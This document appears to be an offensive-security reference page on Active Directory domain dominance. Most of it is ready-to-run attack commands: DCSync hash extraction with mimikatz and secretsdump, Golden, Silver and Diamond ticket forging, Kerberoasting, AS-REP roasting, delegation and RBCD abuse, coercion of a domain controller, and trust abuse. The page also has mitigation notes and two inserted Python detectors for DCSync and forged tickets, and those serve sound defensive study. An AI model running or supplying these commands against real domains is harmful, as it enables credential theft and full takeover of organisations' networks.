Domain Dominance

Domain dominance techniques extract and forge Kerberos tickets, enabling complete control over Active Directory environments with persistent, stealthy access.

Warning

These techniques provide powerful access but can be detected by mature SOCs. Golden Tickets can persist for years - document and revoke after engagement.

DCSync Attack

DCSync simulates domain controller replication to extract password hashes for any domain account, including krbtgt. Requires Replicating Directory Changes permissions (Domain Admins, Enterprise Admins, or delegated rights).
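As an added example (not part of the original page), the Python below flags the DC-side footprint of this technique from a defender's seat: when directory-service access auditing is on, the DC records the access check for the replication extended rights as Event ID 4662 with the right's GUID in the Properties field. The three GUIDs are the schema-defined values for those rights; the allow-list of expected replicators, the account names and the sample events are constructed for the example.

```python
"""Flag DCSync-style replication requests in Security event records (ID 4662).

Added example, not from the original page. A DCSync call needs the directory
replication extended rights; when the DC audits the access check it logs
Event ID 4662 with the right's GUID in the Properties field and access mask
0x100 (control access). Other domain controllers and a few known sync
accounts legitimately hold these rights, so the allow-list is the only
site-specific input. Sample events and account names are constructed.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple

# Extended-right GUIDs for directory replication, as defined in the AD schema.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_FILTERED = "89e95b76-444d-4c62-991a-0facbeda640c"
REPLICATION_GUIDS = {
    DS_REPLICATION_GET_CHANGES,
    DS_REPLICATION_GET_CHANGES_ALL,
    DS_REPLICATION_GET_CHANGES_FILTERED,
}
CONTROL_ACCESS = 0x100  # ADS_RIGHT_DS_CONTROL_ACCESS, the mask logged for extended rights

# Constructed allow-list: DC computer accounts and a directory-sync service
# account that are expected to replicate in this hypothetical forest.
EXPECTED_REPLICATORS = {"DC01$", "DC02$", "svc_adsync"}

GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.IGNORECASE)


@dataclass(frozen=True)
class SecurityEvent:
    event_id: int
    subject_user: str   # SubjectUserName
    access_mask: int    # AccessMask
    properties: str     # Properties field: the right GUIDs, one per line, as logged


def replication_rights(ev: SecurityEvent) -> List[str]:
    """Return the replication-right GUIDs present in a 4662 event (empty if none)."""
    if ev.event_id != 4662 or not ev.access_mask & CONTROL_ACCESS:
        return []
    found = {g.lower() for g in GUID_RE.findall(ev.properties)}
    return sorted(found & REPLICATION_GUIDS)


def flag_dcsync(events, expected=EXPECTED_REPLICATORS) -> List[Tuple[str, List[str]]]:
    """Return (subject, guids) for replication requests by unexpected principals."""
    hits = []
    for ev in events:
        guids = replication_rights(ev)
        if guids and ev.subject_user not in expected:
            hits.append((ev.subject_user, guids))
    return hits


# Constructed sample events, shaped like parsed Security log records.
SAMPLE_EVENTS = [
    # DC02 replicating from DC01: expected
    SecurityEvent(4662, "DC02$", 0x100,
                  "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"),
    # Known sync account: expected
    SecurityEvent(4662, "svc_adsync", 0x100, "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"),
    # Ordinary user exercising Get-Changes-All: this is the DCSync signature
    SecurityEvent(4662, "jdoe", 0x100, "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"),
    # Same user touching an unrelated (constructed) property: not replication
    SecurityEvent(4662, "jdoe", 0x10, "{deadbeef-0000-4000-8000-000000000001}"),
    # Not a 4662 at all
    SecurityEvent(4624, "jdoe", 0, ""),
]


if __name__ == "__main__":
    for subject, guids in flag_dcsync(SAMPLE_EVENTS):
        print(f"possible DCSync by {subject}: {', '.join(guids)}")
```

Tuning the allow-list is the whole game here: every DC computer account and every legitimate directory-sync identity must be in it, and anything that then still exercises Get-Changes-All deserves a ticket.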

Mimikatz DCSync

```text
# Extract specific user
mimikatz # lsadump::dcsync /domain:corp.local /user:Administrator

# Extract krbtgt for Golden Ticket
mimikatz # lsadump::dcsync /domain:corp.local /user:krbtgt

# Extract all users
mimikatz # lsadump::dcsync /domain:corp.local /all /csv
```

Impacket secretsdump

```bash
# DCSync with credentials
secretsdump.py corp.local/admin:P@ssw0rd@dc01.corp.local -just-dc

# Extract just NTDS (all hashes)
secretsdump.py corp.local/admin:P@ssw0rd@dc01.corp.local -just-dc-ntlm

# Extract specific user
secretsdump.py corp.local/admin:P@ssw0rd@dc01.corp.local -just-dc-user krbtgt

# With Kerberos authentication
secretsdump.py -k -no-pass corp.local/admin@dc01.corp.local
```

SharpKatz

```powershell
# DCSync with SharpKatz
SharpKatz.exe --Command dcsync --User corp\krbtgt --Domain corp.local --DomainController dc01.corp.local
```

Golden Ticket

A Golden Ticket is a forged TGT encrypted and signed with the krbtgt account's key, providing access to any service as any user. It stays valid until the krbtgt password is reset TWICE.

Information

Golden Tickets can specify any user, including non-existent ones. They bypass disabled/deleted account checks and can include arbitrary group memberships.

Requirements

```powershell
# Information needed for Golden Ticket:
# 1. Domain SID
whoami /user
# or
Get-ADDomain | Select-Object DomainSID

# 2. krbtgt NTLM hash (from DCSync)
# 3. Domain name
# 4. Target username (can be fake)
```

Mimikatz Golden Ticket

```text
# Create Golden Ticket
mimikatz # kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /krbtgt:ntlm_hash_here /ptt

# With specific groups (Domain Admins = 512)
mimikatz # kerberos::golden /user:FakeAdmin /domain:corp.local /sid:S-1-5-21-xxx /krbtgt:xxx /groups:512,513,518,519,520 /ptt

# Export to file instead of inject
mimikatz # kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-xxx /krbtgt:xxx /ticket:golden.kirbi
```

Impacket ticketer

```bash
# Create Golden Ticket
ticketer.py -nthash <krbtgt_hash> -domain-sid S-1-5-21-xxx -domain corp.local Administrator

# Use the ticket
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass corp.local/Administrator@dc01.corp.local
```

Rubeus Golden Ticket

```powershell
# Create and inject Golden Ticket
Rubeus.exe golden /user:Administrator /domain:corp.local /sid:S-1-5-21-xxx /krbtgt:<hash> /ptt

# Create with specific user and groups
Rubeus.exe golden /user:FakeUser /domain:corp.local /sid:S-1-5-21-xxx /krbtgt:<hash> /groups:512 /ptt
```

Silver Ticket

Silver Tickets are forged service tickets (TGS) that grant access to a specific service without the KDC ever seeing a ticket request. Forging one requires the NTLM hash of the account that runs the service (a user account or the machine account).

Common Service SPNs

```text
# Common target services
CIFS (SMB)      - cifs/server.domain.com    - File shares
HTTP            - http/server.domain.com    - Web services
LDAP            - ldap/dc.domain.com        - Directory queries
HOST            - host/server.domain.com    - WMI, scheduled tasks
MSSQL           - MSSQLSvc/sql.domain.com   - SQL Server
WSMAN           - wsman/server.domain.com   - WinRM/PowerShell Remoting
```

Mimikatz Silver Ticket

```text
# CIFS Silver Ticket (file share access)
mimikatz # kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-xxx /target:fileserver.corp.local /service:cifs /rc4:<service_account_hash> /ptt

# HOST Silver Ticket (WMI, Task Scheduler)
mimikatz # kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-xxx /target:server.corp.local /service:host /rc4:<hash> /ptt

# LDAP Silver Ticket (DCSync without DA)
mimikatz # kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-xxx /target:dc01.corp.local /service:ldap /rc4:<dc_machine_hash> /ptt
```

Impacket Silver Ticket

```bash
# Create Silver Ticket for CIFS
ticketer.py -nthash <service_hash> -domain-sid S-1-5-21-xxx -domain corp.local -spn cifs/fileserver.corp.local Administrator

# Use the ticket
export KRB5CCNAME=Administrator.ccache
smbclient.py -k -no-pass corp.local/Administrator@fileserver.corp.local
```

Diamond Ticket

Diamond Tickets modify a legitimately issued TGT (re-encrypting it after editing the PAC) rather than forging one from scratch, so the DC has a matching TGT request on record and the ticket is harder to spot. Like Golden Tickets, they require the krbtgt key.

```powershell
# Rubeus Diamond Ticket
# Request legitimate TGT, then modify it
Rubeus.exe diamond /krbkey:<krbtgt_aes256> /user:Administrator /domain:corp.local /dc:dc01.corp.local /ticketuser:LegitUser /ticketuserid:1234 /groups:512 /ptt
```

Kerberos Attacks Reference

AS-REP Roasting

```powershell
# Find accounts with "Do not require Kerberos preauthentication"
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true}
```

```bash
# Impacket
GetNPUsers.py corp.local/ -usersfile users.txt -format hashcat -outputfile asrep.txt

# Rubeus
Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt

# Crack with hashcat
hashcat -m 18200 asrep.txt wordlist.txt
```

Kerberoasting

```powershell
# Find service accounts with SPNs
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
```

```bash
# Impacket
GetUserSPNs.py corp.local/user:password -request -outputfile kerberoast.txt

# Rubeus
Rubeus.exe kerberoast /outfile:kerberoast.txt

# Crack with hashcat
hashcat -m 13100 kerberoast.txt wordlist.txt
```

Unconstrained Delegation

```powershell
# Find computers with unconstrained delegation
Get-ADComputer -Filter {TrustedForDelegation -eq $true}

# Monitor for incoming TGTs (on compromised server)
Rubeus.exe monitor /interval:5 /filteruser:DC01$

# Force authentication with PrinterBug/PetitPotam
SpoolSample.exe dc01.corp.local attackserver.corp.local

# Extract and use the TGT
Rubeus.exe ptt /ticket:<base64_ticket>
```

Constrained Delegation (S4U)

```powershell
# Find constrained delegation
Get-ADUser -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
Get-ADComputer -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo

# Rubeus S4U attack
Rubeus.exe s4u /user:svc_sql /rc4:<hash> /impersonateuser:Administrator /msdsspn:cifs/fileserver.corp.local /ptt
```

```bash
# Impacket
getST.py -spn cifs/fileserver.corp.local -impersonate Administrator corp.local/svc_sql:password
```

Resource-Based Constrained Delegation (RBCD)

```bash
# Requirements: Write access to target computer's msDS-AllowedToActOnBehalfOfOtherIdentity

# Create computer account with Impacket (if MachineAccountQuota > 0)
addcomputer.py -computer-name 'EVIL$' -computer-pass 'P@ssw0rd' corp.local/user:pass

# Set RBCD on target
rbcd.py -delegate-to 'TARGET$' -delegate-from 'EVIL$' -action write corp.local/user:pass

# Get service ticket as any user
getST.py -spn cifs/target.corp.local -impersonate Administrator corp.local/'EVIL$':'P@ssw0rd'

# Use the ticket
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass corp.local/Administrator@target.corp.local
```

Cross-Domain Attacks

Inter-Realm Golden Ticket (Trust Abuse)

```text
# Get trust key (from DCSync)
mimikatz # lsadump::dcsync /domain:child.corp.local /user:corp$

# Create inter-realm TGT
mimikatz # kerberos::golden /user:Administrator /domain:child.corp.local /sid:S-1-5-21-CHILD /krbtgt:<trust_key> /sids:S-1-5-21-PARENT-519 /ptt

# Enterprise Admins SID from parent: S-1-5-21-PARENT-519
# This grants Enterprise Admin in parent domain
```

Mitigation & Detection

```text
# Reset krbtgt password (invalidates Golden Tickets)
# Must be reset TWICE: the KDC still accepts tickets encrypted with the
# previous krbtgt key (password history = 1), so one reset is not enough
# Wait for replication between resets

# Detect Golden Tickets:
# - TGT lifetime > domain policy
# - Missing PAC
# - Inconsistent user attributes

# Detect Silver Tickets:
# - Service ticket without TGT request
# - Tickets with suspicious encryption types

# Key Event IDs:
# 4768 - TGT requested (Kerberos AS)
# 4769 - Service ticket requested (Kerberos TGS)
# 4771 - Kerberos pre-auth failed
```
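The following Python is an added example, not from the original page, that turns three of the detection indicators above (for the Golden Ticket and Silver Ticket sections) into checks a SOC could run over parsed Security log records: a service-ticket request (4769) from an account and client address that the DC never issued a TGT (4768) to within the maximum TGT lifetime, a ticket encryption type below domain policy (RC4 where AES is expected), and a TGT whose lifetime exceeds policy, read from klist-style output. The event records, hosts, times and the AES-only policy are constructed; the etype values and field names (TargetUserName, IpAddress, TicketEncryptionType) are the ones Windows uses.

```python
"""Detection heuristics for forged Kerberos tickets, run over constructed samples.

Added example, not part of the original page. Field names follow the Security
log 4768/4769 records; events, hosts and policy values are constructed.
"""
import re
from datetime import datetime, timedelta
from typing import List, NamedTuple

RC4_HMAC = 0x17      # TicketEncryptionType values as logged in 4768/4769
AES128_CTS = 0x11
AES256_CTS = 0x12
POLICY_ETYPES = {AES128_CTS, AES256_CTS}   # constructed policy: AES only
MAX_TGT_LIFETIME = timedelta(hours=10)     # default "Maximum lifetime for user ticket"


class KerbEvent(NamedTuple):
    event_id: int      # 4768 (AS) or 4769 (TGS)
    time: datetime
    account: str       # TargetUserName
    client_ip: str     # IpAddress
    etype: int         # TicketEncryptionType


def tgs_without_tgt(events: List[KerbEvent], window: timedelta = MAX_TGT_LIFETIME) -> List[KerbEvent]:
    """4769 events whose (account, client) had no 4768 within `window` beforehand.

    A forged TGT is injected on the client, so the DC never handled an AS
    exchange for it; the first thing the DC sees is the TGS request. A TGT
    older than the policy lifetime is treated the same way, since a genuine
    one would have expired.
    """
    last_tgt = {}
    flagged = []
    for ev in sorted(events, key=lambda e: e.time):
        key = (ev.account.lower(), ev.client_ip)
        if ev.event_id == 4768:
            last_tgt[key] = ev.time
        elif ev.event_id == 4769:
            seen = last_tgt.get(key)
            if seen is None or ev.time - seen > window:
                flagged.append(ev)
    return flagged


def weak_etype(events: List[KerbEvent], allowed=POLICY_ETYPES) -> List[KerbEvent]:
    """Ticket requests whose encryption type is outside policy (e.g. RC4 in an AES domain)."""
    return [ev for ev in events if ev.event_id in (4768, 4769) and ev.etype not in allowed]


_TIME_RE = re.compile(r"^\s*(Start|End) Time:\s+(\d{1,2}/\d{1,2}/\d{4} \d{1,2}:\d{2}:\d{2})", re.M)


def tgt_lifetime(klist_text: str) -> timedelta:
    """Lifetime of a TGT from klist-style output (Start Time / End Time lines)."""
    stamps = {m.group(1): datetime.strptime(m.group(2), "%m/%d/%Y %H:%M:%S")
              for m in _TIME_RE.finditer(klist_text)}
    return stamps["End"] - stamps["Start"]


def lifetime_exceeds_policy(klist_text: str, limit: timedelta = MAX_TGT_LIFETIME) -> bool:
    return tgt_lifetime(klist_text) > limit


T = datetime.fromisoformat
SAMPLE_EVENTS = [  # constructed
    KerbEvent(4768, T("2024-05-01T08:00:01"), "alice", "10.0.0.15", AES256_CTS),
    KerbEvent(4769, T("2024-05-01T08:00:02"), "alice", "10.0.0.15", AES256_CTS),          # normal
    KerbEvent(4768, T("2024-05-01T08:03:00"), "bob", "10.0.0.20", AES256_CTS),
    KerbEvent(4769, T("2024-05-01T08:03:05"), "bob", "10.0.0.20", RC4_HMAC),              # weak etype only
    KerbEvent(4769, T("2024-05-01T08:05:10"), "Administrator", "10.0.0.99", RC4_HMAC),    # no TGT seen, and RC4
    KerbEvent(4769, T("2024-05-01T19:30:00"), "alice", "10.0.0.15", AES256_CTS),          # TGT from 08:00 is past policy lifetime
]

# Constructed klist-style listing of a ticket with a ten-year lifetime.
SAMPLE_KLIST = """\
#0>     Client: Administrator @ CORP.LOCAL
        Server: krbtgt/CORP.LOCAL @ CORP.LOCAL
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Start Time: 5/1/2024 8:00:01 (local)
        End Time:   5/1/2034 8:00:01 (local)
        Renew Time: 5/1/2034 8:00:01 (local)
"""

if __name__ == "__main__":
    for ev in tgs_without_tgt(SAMPLE_EVENTS):
        print(f"TGS without TGT: {ev.account} from {ev.client_ip} at {ev.time}")
    for ev in weak_etype(SAMPLE_EVENTS):
        print(f"weak etype 0x{ev.etype:x}: {ev.account} ({ev.event_id})")
    print("TGT lifetime over policy:", lifetime_exceeds_policy(SAMPLE_KLIST))
```

The correlation key deliberately includes the client address: a user who renews a TGT from one workstation and then presents a forged one from another would otherwise hide behind their own legitimate 4768. Tune the window to the domain's actual ticket lifetime policy and exclude known RC4-only legacy services before alerting on the encryption-type check.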